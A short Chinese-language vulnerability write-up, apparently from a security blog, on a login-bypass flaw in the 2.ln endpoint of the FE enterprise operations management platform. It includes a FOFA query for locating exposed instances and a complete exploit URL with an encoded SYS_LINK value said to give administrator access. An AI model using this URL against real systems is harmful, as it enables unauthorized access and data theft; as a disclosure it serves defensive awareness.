0x01 产品简介
飞企互联的FE企业运营管理平台是一款基于先进技术的云工作台,采用云计算、智能化、大数据、物联网和移动互联网等技术,以支撑企业的数字化转型。该平台连接人员、设备和内外部资源,满足企业B2B、C2B以及O2O等核心需求。其特色在于提供云端工作环境,整合了人工智能、大数据分析和物联网设备管理,为不同行业客户的互联网+转型提供全面支持。通过智能化的决策支持和数据驱动的业务优化,企业可以更灵活、高效地运营业务,实现数字化转型的战略目标
0x02 漏洞概述
飞企互联的FE企业运营管理平台存在一个潜在的安全漏洞,涉及到2.ln接口的登录绕过问题。未经授权的攻击者可以通过构造恶意的URL访问页面,直接进入后台管理页面,获取敏感信息。这种漏洞可能为攻击者提供了进一步控制整个服务器的机会,对系统的安全性构成潜在威胁。
0x03 影响范围
飞企互联-FE企业运营管理平台
0x04 复现环境
FOFA:app="飞企互联-FE企业运营管理平台"
0x05 漏洞复现
http://IP/2.ln?SYS_LINK=77507068764957484a5067777862714f457a66574871642f4330574c76717868394a35496d37416c497951724f33446f51486375685a5a2b31684938472b7056
输入后边URL即可绕权限校验,以管理员权限登录系统。